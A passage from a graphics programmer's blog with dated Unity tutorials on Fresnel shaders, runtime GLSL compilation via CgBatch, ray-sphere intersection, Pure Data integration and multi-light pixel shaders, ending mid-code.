So, if you’ve been missing the feeling of cooking meat over an open flame lately, check out my game: Zen Burnt (a play on the name Zen Bound), just keep your hopes down :P it’s a very very tiny jam game.

Also, I’ll get back to posting every other week or so now. Things got a bit derailed this month because I started a new job (hurray shader dev!), but I already have a much more typical tutorial post in the works for later this week. If ray/triangle intersection sounds interesting to you, check back this weekend!

Finally, as always, send me a message on twitter if you feel like it!

The Basics of Fresnel Shading

2014-02-18T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!

I recently stumbled on the awesome article: Everything Has Fresnel (if you haven’t read it, go read it now). The main premise of the article is that real world materials are not actually as neat and tidy as programmers would like to believe, and more specifically, that virtually everything in real life has some degree of fresnel reflectivity.

Fresnel isn’t an effect that I’ve seen often in Unity projects and in fact wasn’t an effect that I was familiar with building, so I decided to kill two birds with one project and put together my latest shader pack: Fresnel Shaders. It’s all free to use, MIT license, all that jazz, so enjoy :D

But, as usual, I’d also like to make things a bit easier for the next googler looking for an intro to Fresnel reflection. So if writing Fresnel shaders (or adding Fresnel to existing ones) sounds as much fun to you as it was for me, read on!

An unlit Fresnel shader

What is the Fresnel Effect

In essence, the fresnel effect describes the relationship between the angle that you look at a surface and the amount of reflectivity you see. This is very easy to demonstrate if you have a window nearby. If you look at the window straight on you can see through the window as intended, however, if you move so that you try to look through the window at a glancing angle (ie: your view direction is approaching parallel to the window’s surface) the window becomes much closer to a mirror.

But this effect isn’t limited to windows, or even particularly shiny objects. As John Hable points out in Everything Has Fresnel, pretty much everything (including towels and bricks!) exhibit the fresnel effect to some degree. I’ve made a game out of trying to spot instances of it as I walk to work (without looking I’ve lost my mind).

So what does this look like when added to an object in Unity? Here’s a few more examples from my shader pack:

The Shaders in the Fresnel Shader Pack

How is it implemented?

As it turns out, Fresnel equations are complicated, way more so than can be adequately covered by a blog post, and way more than is feasible to execute in real time for most applications. In practice, it’s far more realistic to use an approximation of these equations. In searching, I’ve ended up finding two such approximations have so far seemed appropriate to use in real time shaders.

The first is the Schlick Approximation. This is easy enough to google for, but I’ll put here just for reference as well:

R(θ) = R₀ + (1 - R₀)(1 - cosθ)⁵

In the above equation, R₀ refers to the reflection coefficient for light moving between 2 interfaces with different refractivity (most commonly, air and whatever type of material the surface is). If you’re really interested, definitely check out more detailed sources online. In practice, I’ve found that while this method gives decent looking results, the next option gives us much greater control over the appearance of our materials at the cost of physical correctness. Given that real time graphics are anything but physically correct, I’m ok with this tradeoff.

The second approximation comes from chapter 7 of the Cg Tutorial from NVidia, which refers to it as the “Empricial Approximation.”

R = max(0, min(1, bias + scale * (1.0 + I • N)^power))

R is a Fresnel term describing how strong the Fresnel effect is at a specific point
I is the vector from the eye to a point on the surface
N is the world space normal of the current point
bias, scale and power are values exposed to allow control over the appearance of the Fresnel effect

This equation is a bit of a double edged sword. It’s very easy to make hideous looking Fresnel by tweaking the values of bias, scale and power, but it also gives you the ability to fine tune your materials to exactly how you want them to look.

Fresnel gone wrong

A Fresnel Shader

So what does this look like in a shader? It’s actually very simple. First, you need to calculate the value of R. For this example, we’ll do that in the vertex shader:

vOUT vert(vIN v)
{
	vOUT o;
	o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
	o.uv = v.texcoord;

	float3 posWorld = mul(_Object2World, v.vertex).xyz;
	float3 normWorld = normalize(mul(float3x3(_Object2World), v.normal));

	float3 I = normalize(posWorld - _WorldSpaceCameraPos.xyz);
	o.R = _Bias + _Scale * pow(1.0 + dot(I, normWorld), _Power);

	return o;
}

There isn’t too much to say about this, since it’s pretty much the equation above verbatim. One handy tip though: I’ve found that I’ve been perfectly happy with the results I get if I omit the bias parameter entirely, and doing so makes it more difficult to produce wonky results.

Once you have the R value calculated, the rest of the implementation is just a lerp in the fragment shader:

float4 frag(vOUT i) :  COLOR
{  
	float4 col = tex2D(_MainTex, i.uv.xy * _MainTex_ST.xy + _MainTex_ST.zw);
	return lerp(col,_Color, i.R);
}

If you’re not a Unity programmer, ignore all the _MainTex_ST stuff, that’s just a unity specific bit of code to handle tiling textures across an object.

Otherwise, all that’s new here is the lerp function. In this example, rather than reflecting anything, our Fresnel Rim is just a single color (_Color), but the principle is the same. If you wanted to turn the rim into a reflection, you’d simply replace the _Color variable with a color sampled from a cube map, or taken from a camera, or however else you want to pass in a reflection.

Otherwise though, this is all there is to it to write a simple Fresnel shader, so go forth and make all of your objects more believable! And feel free to download the Fresnel Shader Pack that I’ve posted in the graphics section of this site to see some examples of more complicated Fresnel effects.

If you’ve spotted an error on here, or have anything to add, feel free to send me a message on twitter. Happy shading!

Creating GLSL Shaders at Runtime in Unity3D

2014-01-12T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!

The feeling of solving a problem that seems potentially impossible is awesome. My latest project is no exception.

The concept involves users being able to write shaders while the program is running, and compiling them at runtime onto objects in the scene. Normally this wouldn’t be an unreasonable task, however this project is being built in Unity, which complicates things immensely.

I had seen an example of shaderlab code being passed to the Material constructor at runtime before, but I hadn’t ever seen anyone play around with any other shader language in the same way. It turns out that’s because you can’t. The Material constructor that I was hoping to use only accepts Shaderlab; Unity doesn’t support runtime compilation of GLSL, Cg, or HLSL, end of story.

Except that isn’t the whole story. If it was, this would be a very short post. It turns out that with some elbow grease, you can actually get other languages (or at least GLSL) to compile. The rest of this post is going to show you how.

Type the fragment shader into the box, hit the button, watch the magic happen

Setting Up Your Project

There are at least a few people who have tried to make this work before. A quick google search for “runtime shader compilation unity” will bring you to this Unity forum post. If you scroll down you’ll find a post from a user named Sirithang, who is the real unsung hero of this post.

Their post talks about a tool called CgBatch, which is included with Unity, and according to this SIGGRAPH presentation, is either the entire shader compilation pipeline for Unity, or is at least one step in it. The siggraph link only describes it as a tool to generate HLSL, but in practice it seems to fully translate shaders into a format accepted by that material constructor from above. Since CgBatch isn’t meant for public use, there isn’t anything in the way of documentation to know for sure.

Ok, so we know we need to use CgBatch, but where do we get it. On Mac, you can find it inside of Unity.app (right click and select “Show Package Contents”), inside the Tools folder. On Windows, you’re looking for CgBatch.exe, located in Unity/Editor/Data/Tools. Thanks to @izaleu for finding this on Windows :D ). Create a folder inside your project’s StreamingAssets directory and paste CgBatch into it (it must be inside subdirectory of StreamingAssets).

CgBatch also relies on Cg.framework, which you can find in the Unity.app/Contents/Frameworks folder. If you try to run CgBatch however, you’ll notice that it actually relies on Cg.framework being located in “../Frameworks/Cg.framework”, so copy and paste the entire folder into your project’s StreamingAssets folder.

Finally, you will need to provide a path to the CGInclude files as part of using CgBatch, and since we don’t want our users to have to have Unity installed to use our program, you will also need to copy the CGIncludes folder to your StreamingAssets directory.

Aside: If you’ve never used the StreamingAssets folder before, it is simply a folder that you place in your project’s assets folder, name “StreamingAssets,” everything in this folder will be included exactly as is in your built project’s Application.streamingAssetsPath.

Deciphering CgBatch

So how do you use CgBatch. If you’ve attempted to run it from the command line you’ve probably seen the following message:

E -1: Failed to launch CgBatch (incorrect parameters). Usage: CgBatch input path includepath output [-xbox360] [-ps3]

So CgBatch needs at least 4 parameters. Based on the forum post linked previously, these arguments are as follows:

input : The path to your uncompiled shader file
path : The path to the directory that contains your shader
includepath : The path to the CGInclude files for Unity
output : Where to put the output shader file.

If you run this with the appropriate parameters, you should be able to get output that can be accepted by the Material shader string constructor, which is great! So now we need to be able to do this inside a running program.

Introducing System.Diagnostics

Thankfully, Mono has us covered (even on Mac!). The Process class (inside System.Diagnostics) is specifically designed to run command line applications, and can be configured to execute programs in bash as well as the windows command line.

The way to do this is to create a new Process object, and use that object’s StartInfo property to specify exactly what command and arguments you wish to execute, and then call Process.Start();

In practice, this looks like the following:

using System.Diagnostics;
	
Process process = new Process();
process.StartInfo.FileName = "bash";
process.StartInfo.Arguments = "-c '" + [Command] [arg1] [arg2] ... +"'";
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;

process.Start();

(the above is mac specific, I don’t have a windows machine to work try this stuff out on right now)

As shown above, the name of the command that you need to execute is actually bash, and not CgBatch. In order to execute a command from batch, you need to pass that as an argument to bash using the -c flag, and enclosing the command and all its arguments inside single quotes.

Setting RedirectStandardOutput to true allows us to read the output of the command into the Unity console (really handy for debugging), but in order for that to work, UseShellExecute needs to be set to false, which means that we will not be using the operating system shell to launch the program (in this case bash), we will launch bash directly.

Actually Making This Work

Now we have our tools set up, we now how to execute CgBatch, it’s time to put it all together.

For the proof of concept, I only wanted users to write fragment shaders, so I needed to provide a vertex shader for them:

	
string prefix = "Shader \"Temp\"{\nProperties{\n}\nSubShader {" +
	"\nTags { \"Queue\" = \"Geometry\" }\nPass {\nGLSLPROGRAM\n#ifdef VERTEX\n" +
	"void main(){\n" +
	"gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n" +
	"}\n" +
	"#endif\n" +
	"#ifdef FRAGMENT\n" +
	"uniform float _time;\n";

The above example is for writing a glsl shader at runtime. I haven’t yet been able to get Cg compiling using the method presented in this post, but I’m sure it can be done with the right arguments to CgBatch.

You’ll notice I’m also including a uniform for Time. This is because I have yet to figure out how to get Unity’s specific constants to be recognized in the User written shader, and Time is useful enough that I’m passing it in myself (just call the Shader.SetGlobalFloat argument in Update to do the same).

Next up, we need to write the code that will come after the user’s fragment shader to finish off the shader file:

	
string suffix = "\n#endif\nENDGLSL}}}";

As the variable names suggest, the user’s fragment shader will be positioned in between these two strings when building our input file.

Get the user input however you see fit (I as the picture earlier showed, I’m using Unity.GUI for now), and then assemble the full file string with prefix+USERINPUT+suffix.

Once you’ve assembled the full shader string, you need to write it to a file, since CgBatch expects the input parameter to be a file path. Since we don’t want this file to persist between runs, I’m writing the input file to Application.temporaryCachePath.

	
byte[] byteShader = System.Text.Encoding.UTF8.GetBytes(prefix+shader+suffix);

var tempShader = File.Create(Application.temporaryCachePath+"/tempshader.shader");
tempShader.Write(byteShader,0,(prefix+suffix+shader).Length);
tempShader.Close();

Finally, we need to read in the output and actually build a material out of it. All together, the shader compilation process looks like the following:

	
byte[] byteShader = System.Text.Encoding.UTF8.GetBytes(prefix+shader+suffix);

var tempShader = File.Create(Application.temporaryCachePath+"/tempshader.shader");
tempShader.Write(byteShader,0,(prefix+suffix+shader).Length);
tempShader.Close();

Process compileProcess = new Process();
compileProcess.StartInfo.FileName = "bash";

compileProcess.StartInfo.Arguments = "-c '"
	+Application.streamingAssetsPath
	+"/Tools/CGBatch "
	+Application.temporaryCachePath
	+"/tempshader.shader ../CGIncludes/ ../CGIncludes/"
	+Application.temporaryCachePath
	+"/testOutput.shader'";
	
compileProcess.StartInfo.RedirectStandardOutput = true;
compileProcess.StartInfo.UseShellExecute = false;

compileProcess.Start();
var output = compileProcess.StandardOutput.ReadToEnd();
compileProcess.WaitForExit();

string compiled = File.ReadAllText(Application.temporaryCachePath
		+"/testOutput.shader");
									
Material m = new Material(compiled);
cube.renderer.material = m;

UnityEngine.Debug.Log(output);

The above has only been tested on mac. On Windows, you will need to replace “bash” with “cmd” and the arguments with whatever is appropriate for your system. I unfortunately don’t have a Windows machine to test it out (again, send me a message on twitter and I’ll update this).

But, provided you’re on Mac, or have figured out the Windows changes, you should now be able to compile GLSL at runtime! You laugh in the face of Unity not supporting this feature!

You may also notice that your build product is 50MB larger than you expect. This is because we’re including all of Cg.framework with our project so that CgBatch can use it during compilation. I expect that this extra file size is one of a number of reasons that Unity has opted to leave this feature out by default.

That’s all for now! Hopefully this wall of text has opened up a whole world of experimental gameplay to you! I’d love to hear about any improvements to the above, any further knowledge about CgBatch, and especially any other tricks like this that allow weird stuff to be done in my favourite engine, so as I’ve said twice already, TWITTER!

Ray-Sphere Intersection with Simple Math

2013-12-24T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

Lately I’ve been working on a ray tracer. It’s been going well (or at least as well as I could hope my first renderer could go), but it has been a slow process. I don’t have a formal math background - my day to day work only ever goes as far as enough linear algebra to write shaders, and enough of everything else to implement whatever gameplay I need - and none of this prepared me for the endless pages of ray tracing resources that expected much more math knowledge than I have.

The current output of my ray tracer

So I thought that I’d do my part for the next person who starts writing a ray tracer, and share a bit of what I’ve figured out in as much detail as possible, as clearly as possible.

As the title of this post suggests, the end product of this post will be a function which will take a ray and a sphere, and return both if the they intersect, and if so, the location of the intersection(s).

What you need to know before starting

I’m going to try to keep things as basic as possible. In order to follow this post, you’ll need:

a basic understanding of trigonometry
a good handle on vector math (including dot products)

Have you got that? Good! If not, there are a bazillion resources online, go check one of them out before proceeding.

Representing our objects

The first thing we need to get a handle on is how to best represent a ray. If you recall from high school geometry, a ray consists of a single point (the origin), and extends from that origin indefinitely along a direction vector. So for our purposes, a ray is simply a struct which consists of an origin vector and a direction vector.

struct Ray
{
	vec3 origin;
	vec3 direction;
};

With these 2 vectors, we can represent any point on the ray like this:

Origin + Direction * t = Point

Each point will have a specific t value, representing how far along the direction vector the point lies, but the equation remains the same otherwise. This will be important later, so make sure that you try this out on paper and really understand it before proceeding.

Spheres are even simpler. Given that spheres don’t have a direction, all we need is the location of the center point, and the radius of the sphere. This means our sphere object will simply be a struct containing one vector and one float.

struct Sphere
{
	vec3 center;
	float radius;
};

Turning Vectors into Scalar Values

Alright, so the image above shows the general lay of the problem. We have a ray, and a sphere, we know the ray’s origin point, and it’s direction, and we know the location of the sphere’s center point. What we want to do, is determine if the ray will ever intersect the sphere (spoiler: in this tutorial, it will), and if so, where that intersection occurs.

There are 2 points that I haven’t mentioned yet, labelled above as P1 and P2, these are the points that we want to solve for, as both of these represent a point of intersection.

Speaking of those points, remember that we can solve for any point on a ray with the following equation:

Origin + Direction * t = Point

So, in order to get the locations of the P0 and P1, all we need to do is find the correct t value for each of them. This is going to make our lives a lot easier, provided you remember a bit of trig (don’t worry, I didn’t either, we’ll go over it as we get to it), since now all we need to do is find 1 number for each point, instead of their exact co-ordinates.

While we’re identifying values to solve for, there are two more t values that are important to us, shown below in blue and green, tc is the distance from the origin to the a point on the ray halfway between the 2 intersection points, and t1c is the distance between t1 and tc. We’ll see why these are important in a minute.

To review these t values have been labelled t1, t2, tc and t1c. t1 and t2 correspond to the points P1 and P2 on our diagram, tc represents the t value to the center and t1c is the distance between P1 and tc.

Finding tc

As the headline suggests, the first value we need to solve for is tc. As the diagram below shows, the first step to finding tc is to create a right angle triangle, using tc, the vector from the sphere’s center to the ray’s origin, and a line (d) from the center to the ray.

The first thing we need to find is the length of L. This is simple enough, since we know the positions of both the center and ray origin.

L = C - Origin

Once we have L, we can use the dot product between L and the ray’s direction in order to get the value for tc. Don’t worry if this seems unintuitive, it had been awhile since I used dot product for projections too. Luckily there are lots of good resources out there that explain this concept (like this one). Moving on though, this means that we have found the value for tc:

tc = L · Direction

This is an important calculation. If the result of this is that tc is less than 0, it means that the ray does not intersect the sphere, and we can bail out of our intersection test early. If it’s not less than 0, we move on.

The last thing we need to do with this triangle is solve for the length of d. This isn’t important for tc, but will be in the next section, so we may as well do it now while we’re still thinking about this triangle.

To solve for d, we need to bust out some high school math. If you’re like me, you’ll need a bit of a refresher on this, and I found that it was helpful to rotate our triangle around bit to put it in a more familiar orientation.

Looking familiar yet? If you can remember Pythagoras’ Theorem, you’ll already know where I’m going with this. If not, I’ll help:

a² + b² = c²

We need to find d, which in this case is edge b, so we need to rearrange the equation a bit:

b² = c² - a²
b = √(c² - a²)

Now we just sub in our known values from earlier

d = √(tc² - L²)

Just like tc before it, this is an important calculation. If d is greater than the radius of our sphere, it means that t1c will give us a point outside of the sphere, and our ray doesn’t intersect at all (and we can go home early).

If not, great! Time to move on to the next triangle.

Solving for t1c

Now that we have tc and d, this is actually incredibly easy. Since a² + b² = c², we already know the length of the edge labelled h (it’s the radius of the sphere) and the length of d. Using Pythagoras’ Theorem again gives us:

a² = c² - b²
a = √(c² - b²)
t1c = √(radius² - d²)

Guess that means it’s time to move on to yet another subheading eh?

Solving for t1 and t2

Let’s look at our original diagram again:

Notice anything? Now that we have values for t1c and tc, solving for the two variables we actually want is trivial!

t1 = tc - t1c
t2 = tc + t1c

Which means that all we need to do to get our intersection points is:

P1 = Origin + Direction * t1
P2 = Origin + Direction * t2

An Intersect Function

Congratulations on getting this far! Now that we have all that theory out of the way, it’s time for your prize: a sphere intersection function! Let’s see what that might look like if we simply went step by step using the instructions above:

	
bool intersec++(Ray* r, Sphere* s)
{
	//solve for tc
	float L = s->center - r->origin;
	float tc = dot(L, r->direction);
	if ( tc < 0.0 ) return false;
	
	float d = sqrt((tc*tc) - (L*L));
	if ( d > s->radius) return false;
	
	//solve for t1c
	float t1c = sqrt( (s->radius * s->radius) - (d*d) );
	
	//solve for intersection points
	float t1 = tc - t1c;
	float t2 = tc + t1c;
	
	return true;
}

For really basic use cases, the above may be sufficient, but there’s an awful lot of wasted effort up there (like calculation t1 and t2 and then not using them). For a ray tracer (the use case that led me to writing this post) it isn’t enough just to know if a ray hits an object, you need to know exactly where the point of contact is.

So let’s rethink the above function (and optimize it in the process):

	
bool intersect(Ray* r, Sphere* s, float* t1, float *t2)
{
	//solve for tc
	float L = s->center - r->origin;
	float tc = dot(L, r->direction);
	
	if ( tc &lt; 0.0 ) return false;
	float d2 = (tc*tc) - (L*L);
	
	float radius2 = s->radius * s->radius;
	if ( d2 > radius2) return false;

	//solve for t1c
	float t1c = sqrt( radius2 - d2 );

	//solve for intersection points
	*t1 = tc - t1c;
	*t2 = tc + t1c;
	
	return true;
}

Much better! Not only are we returning getting the solved t values out of the function, but we’ve also managed to get rid of a costly square root operation. This may not seem like a big deal, but when you factor in how many times you will be calling this intersect function, any optimizations you can make pay dividends.

Whew, that was a long post. If anything is unclear, or you spot a mistake (I wrote most of this on a train, it’s very possible something is a bit off) feel free to send me a message on Twitter.

Merry Christmas! :D

Combining Pure Data and Unity

2013-11-10T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

About 6 months ago, for 1GAM, Johannes and I spent a month tinkering with LibPD (the end result was Synapse). LibPD, for those of you who don’t know, is a library for working with Pure-Data, a visual programming tool for procedural audio. Out of the box, it doesn’t work nicely with Unity, but there’s a repository called libpd4unity that simplifies the process.

The sample pd program used in this tutorial

Libpd4unity isn’t suited to really in depth PD development in Unity (at the moment it seems to only support loading one patch at a time), but you can still do some interesting things with it. So today, I’m going to go over the process of setting up libpd4unity with Unity.

If you’re on mac, you may be a bit disappointed to see that there isn’t a mac compatible pd library in the libpd4unity class, so the first step for us is to compile a .bundle for mac. If you’re on windows, skip down to the actual programming.

Building libpdcsharp.bundle

Thankfully this is pretty straightfoward, if a bit weird:

Download the LibPD Project from github
In terminal, cd into the downloaded project folder and type the command make csharplib
libcsharp.dylib should now be created inside the libs folder. Copy that to the Assets/Plugins folder in Unity
Rename this file to libcsharp.bundle. Unity has a problem locating dylibs.
You’re good to go!

LibPD and Unity

Note: You will need to download Libpd4Unity

Ok now that that’s out of the way, it’s time for some fun stuff. First off, copy the LibPD folder from libpd4unity/Assets, and paste it into the assets folder of your project.

Next, make an Assets/Resources folder. This is a special folder that allows you to specify resources that you want to have available to Unity at runtime. Put your patches in this folder (or a subfolder of it). If you don’t have a patch to work with, or want to follow along exactly with this demo, you can grab the simple sine patch from the repo for this post’s example project (patch courtesy of johannesg.com ).

Now that all the housekeeping is taken care of, it’s time to actually interact with a patch program from Unity. LibPd4Unity comes with an example script called LibPdFilterRead.cs that will serve as the basic outline for our class, but we’re going to tailor ours to suit our needs a bit better.

using UnityEngine;
using System.Collections;
using LibPDBinding;
using System;
using System.Runtime.InteropServices;

public class OSCControl : MonoBehaviour
{
	public string patch;
	public bool playOnAwake = false;		
	public bool patchIsStereo = false;

	private int patchName;
	private bool islibpdready;
	private string path;
	private GCHandle dataHandle;
	private IntPtr dataPtr;
	private float freq = 500;

The script I’m going to build here interacts with the sample patch linked above.

Lets go through these variables:

patch: the name of the patch file to use
playOnAwake: what it says on the tin
patchIsStereo: only check this if you are SURE your patch is stereo, otherwise you’ll hear garbled crap
patchName: the integer patch name generated by LibPD
islibpdready: does what it says on the tin
path: this will be the patch variable with the rest of the filepath prepended to it
dataHandle: this will eventually be used to let us have access to the audio stream from pd without worrying about the garbage collector
dataPtr: this will hold the address of the patch we’re interacting with
freq: the frequency we want to pass to our program

Now let’s get to some functionality

void Awake ()
{
	path = Application.dataPath + "/Resources/" + patch;
	if ( playOnAwake)loadPatch ();
}

public void loadPatch ()
{
	if(!islibpdready)
	{
		if (!patchIsStereo)	LibPD.OpenAudio (1,1, 48000);
		else LibPD.OpenAudio(2,2,48000);
	}

	patchName = LibPD.OpenPatch (path);
	LibPD.ComputeAudio (true);
	islibpdready = true;
}

Awake isn’t all that interesting, except to show off how to get the actual file path to the patch. Also note that loadPath() needs to be called before we can start working with pd.

loadPatch is the standard initialization sequence for working with libPd.

I’m going to hold off on the good stuff until the end, so we’re going to skip from the initialization process down to the cleanup process. This is a little more involved than the usual in C# because we are explicitly telling the garbage collector to not interact with the data stream, so we need to do a bit of manual memory management. This is taken directly from the example project in LibPd4Unity.

public void closePatch ()
{
	LibPD.ClosePatch (patchName);
	LibPD.Release ();
}

void OnApplicationQuit ()
{
	closePatch ();
}

public void OnDestroy()
{
	dataHandle.Free();
	dataPtr = IntPtr.Zero;
}

I don’t have a good explanation for why we don’t need to free the dataHandle on close patch, so if anyone has an idea, shoot me a message on twitter and I can update the post. Otherwise, this is boilerplate code that will need to be added to every class that you write that will handle loading a Pd program.

And now finally, the good stuff!

public void OnAudioFilterRead (float[] data, int channels)
{
	if(dataPtr == IntPtr.Zero)
	{
		dataHandle = GCHandle.Alloc(data,GCHandleType.Pinned);
		dataPtr = dataHandle.AddrOfPinnedObject();
	}

	if (LibPD.Process(32, dataPtr, dataPtr)==0) {
		LibPD.SendFloat(patchName + "freq1", freq);
		LibPD.SendFloat(patchName + "freq2", freq);

	}
}

void OnGUI()
{
	Rect r = new Rect(Screen.width/2 - 50 ,
			Screen.height/2 - 150,
			100,
			300);

	freq = GUI.VerticalSlider(r,freq,1000, 400);

	Rect r2 = new Rect(Screen.width/2-30,
			Screen.height/2 - 30,
			80,
			30);

	GUI.Box(r2, ""+freq+" hz");
}

OnAudioFilterRead is the callback method used by LibPd4Unity’s library. It will be called whenever the internal audio buffer has been filled. I’m really not sure why we’re checking that libPD.Process returns 0, although I assume that’s LibPD’s “all good” return value. Inside that block you can see how to pass messages to the currently running patch. What tripped me up for awhile was both the need to prepend the target value’s name with the int name of the loaded patch, and the need to leave off the “$0” part of the variable name, which is displayed when you open the patch in pd.

Building a Project on Mac

Everything should now work fine in the editor, but if you’re on mac, your journey is not over yet!

If you have tried to actually create a build, you will have noticed the big, ugly error message that pops up:

Error building Player: IOException: Cannot create Temp/StagingArea/UnityPlayer.app/Contents/Plugins/libpdcsharp.bundle/libpdcsharp.bundle because a file with the same name already exists.

Apparently Unity really really hates people who use libpd. Thankfully, there is a solution!

Remove libpdcsharp.bundle from your plugins folder (but don’t delete it, we’ll need it in a second)
Build your project as you normally would
Locate the .app file that you just built, right click on it, and select “Show Package Contents,” and open the “Contents” folder within
If there is no folder named “Plugins” inside Contents, create one now.
Paste libpdcsharp.bundle into the Plugins folder
Go back to your Unity project, and copy the .pd file from your resources folder
Paste this file into the Resources folder located inside your .app’s Contents folder.

All of this is necessary because Unity’s build process doesn’t like the libpdcsharp bundle, and attempts to copy it multiple times (creating that ugly error), and completely ignores the patch file in Resources because it doesn’t recognize the file extension. Thankfully, all that’s needed to resolve this a mildly annoying process.

If you’ve made it this far, you should now have a unity project that can interact with Pure Data plugins, and can actually create builds! Congratulations! If you’ve hit any difficulties or need further clarification on something I’ve said here, you can download a sample project from my dropbox, or send me a message on Twitter. Hope this tutorial helped!

Writing Multi-Light Pixel Shaders in Unity

2013-10-13T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

One of the first things that people get shown when they start learning shaders is how to write a simple, single light, diffuse shader. I have yet to see a single shader tutorial out there that ever returns to this initial exercise to demonstrate how to write shaders which can properly interact with multiple (and different kinds of) lights. So I’m going to try to fill in that gap with what I’ve managed to figure out on my own.

This will hopefully serve as a good starting point for any truly custom lighting shaders you want to write. To be clear, the end goal of this tutorial is simply to have a pixel shader that looks as close as possible to the built in Diffuse shader. The end result of this shader looks like this:

Our shader is on the left, compared to the built in diffuse on the right

Ok, let’s get started with a basic skeleton of what we’re building. Mulit-light shaders (in Forward Rendering) use a separate pass for each pixel light in the scene. How this looks in practice is 2 defined passes in the shader. One (the Base Pass) renders the first light in the scene, and the second pass (the Add pass) gets called once for each additional light, and is additively blended with the previous passes. It looks something like this:

  
Shader "BetterDiffuse" 
{
  Properties 
  {
  _Color ("Main Color", Color) = (1,1,1,1)
  _MainTex ("Base (RGB) Alpha (A)", 2D) = "white" {}
  }
  SubShader 
  {

  Tags {"Queue" = "Geometry" "RenderType" = "Opaque"}
  Pass 
  {
  Tags {"LightMode" = "ForwardBase"}     
  CGPROGRAM
  #pragma vertex vert
  #pragma fragment frag
  
  ENDCG
  }
 
  Pass 
  {
  Tags {"LightMode" = "ForwardAdd"}    
  Blend One One  
  CGPROGRAM
  #pragma vertex vert
  #pragma fragment frag
   
  ENDCG
  }
  }
  Fallback "VertexLit"
}

Nothing compiles yet, but at least we have the basic structure we’re going to use in place. You can see above that the base and add passes are marked using the LightMode tag. This is a tag which tells unity which pass to use for which. The “Forward” prefix on Add and Base identifies that these passes are for Forward rendering. This tutorial won’t cover Deferred Rendering (mostly because I haven’t wrapped my head around it yet).

If you’re wondering, the fallback to VertexLit allows us to use the VertexLit shaders shadow passes. Our shader will not cast shadows properly without this.

Next, let’s look at what our vertex input and output structs need to be:

  
struct vertex_input
{
  float4  vertex  : POSITION;
  float3  normal  : NORMAL;
  float4  texcoord  : TEXCOORD0;
};

  
struct vertex_output
{
  float4  pos   : SV_POSITION;
  float2  uv  : TEXCOORD0;
  float3  lightDir  : TEXCOORD1;
  float3  normal  : TEXCOORD2;
  LIGHTING_COORDS(3,4) 
};

Output wise, we need the obvious position, uv coords and vertex normal, we also need to get the vector from our vertex to the current light in object space. Finally, we need to grab light attenuation information, and shadow info. Unity has a macro for grabbing those last two items, LIGHTING_COORDS(x,y). This macro will put lighting info into TEXCOORDX and shadow info into TEXCOORDY. This takes care of the messy business of dealing with all the different datatypes needed for different types of lights.

Just remember to include UnityCG.cginc, Lighting.cginc and AutoLight.cginc if you’re using the Unity macros.

Ok, things are looking pretty good here. Let’s move on the vertex program. For the most part, the vertex program for each pass is fairly normal (for now, we’ll come back to this later when we talk about vertex lights).

vertex_output vert (vertex_input v)
{
  vertex_output o;
     
  o.pos = mul( UNITY_MATRIX_MVP, v.vertex);
  o.uv = v.texcoord.xy;
  o.normal =  v.normal;
    
  o.lightDir = ObjSpaceLightDir(v.vertex);
  TRANSFER_VERTEX_TO_FRAGMENT(o); 

  return o;
}

The 2 lines before the return bear a bit more explanation. ObjSpaceLightDir(float4 x) is a method provided in AutoLight.cginc. Simply put, it returns a vector going from the light to the current vertex in object space. You can check out ObjSpaceLightDir in UnityCG.cginc if you’re interested in the details, but for our purposes, using the built in function will be fine.

TRANSFER_VERTEX_TO_FRAGMENT is the macro provided to transfer the data declared with LIGHTING_COORDS to the fragment program. It does some co-ordinate space conversions as well, but since we’re just going to grab the end values from all these calculations for our light attenuation, we don’t need to worry about them right now. For now our goal is just a pixel shader that looks like the Diffuse surface shader.

Alright, on to the fragment program for our passes. For one, we’re going to need to grab the colour from the texture we have applied to our mesh, and do a colour multiply on it to take into account the inspector inputs we defined at the top of the page. Then we’re going to be getting the lighting attenuation value from Unity. Finally, we’re going to use the lightDir variable we set in the vertex shader to calculate the diffuse lighting value with.

sampler2D _MainTex;
float4 _MainTex_ST;
fixed4 _Color;
fixed4 _LightColor0;

half4 frag(vertex_output i) : COLOR
{
  fixed4 tex = tex2D(_MainTex, i.uv * _MainTex_ST.xy + _MainTex_ST.zw);
  tex *= _Color;   

  fixed atten = LIGHT_ATTENUATION(i); 

  i.lightDir = normalize(i.lightDir);
   
  fixed diff = saturate(dot(i.normal, i.lightDir));
  
  fixed4 c;
  c.rgb = UNITY_LIGHTMODEL_AMBIENT.rgb * 2 * tex.rgb;   
  c.rgb += (tex.rgb * _LightColor0.rgb * diff) * (atten * 2); 
  c.a = tex.a + _LightColor0.a * atten;
  return c;
}

Not much here should be too out of the ordinary (save for the call to LIGHT_ATTENUATION). One thing that I’ve yet to be able to account for are the multiplications by 2 in the diffuse calculations. It’s very clear that this gives us an end result that looks like the built-in diffuse shader, but I’m not entirely sure why the built in diffuse shader would be multiplying these values by 2 either. Nevertheless, to hit our goal, we’re going to do it too. Just remember to leave out the ambient calculations in the ForwardAdd pass, otherwise things will be way too bright.

Great! If you try out the shader now, it should look pretty darn good. Don’t get too comfy though, there’s still one more task to do. If you add more than 3 lights to your scene you will notice the shader starts behaving strangely right now. This is because we haven’t specified what we want to do with Vertex lights. Unity only supports up to 4 Per-Pixel lights, but it will allow 4 more lights to be used on a per vertex basis. Unfortunately our current code doesn’t take into account these lights, so we need to add support for them now.

Step one is to add a float3 to our output struct to hold the summed colour of the lights for the current vertex. Next we need to convert our object space position and normal into world space, and pass them to a for loop that calculates the diffuse lighting for each of the 4 possible vertex lights. Once we get that colour into our frag shader, we just add it to the colour we’re already multiplying the texture by. The end result isn’t exactly identical to the built in shaders, but it’s a reasonable approximation.

Our new ForwardBase vertex_output struct looks like this:

struct vertex_output
{
  float4  pos   : SV_POSITION;
  float2  uv  : TEXCOORD0;
  float3  lightDir  : TEXCOORD1;
  float3  normal  : TEXCOORD2;
  LIGHTING_COORDS(3,4) 
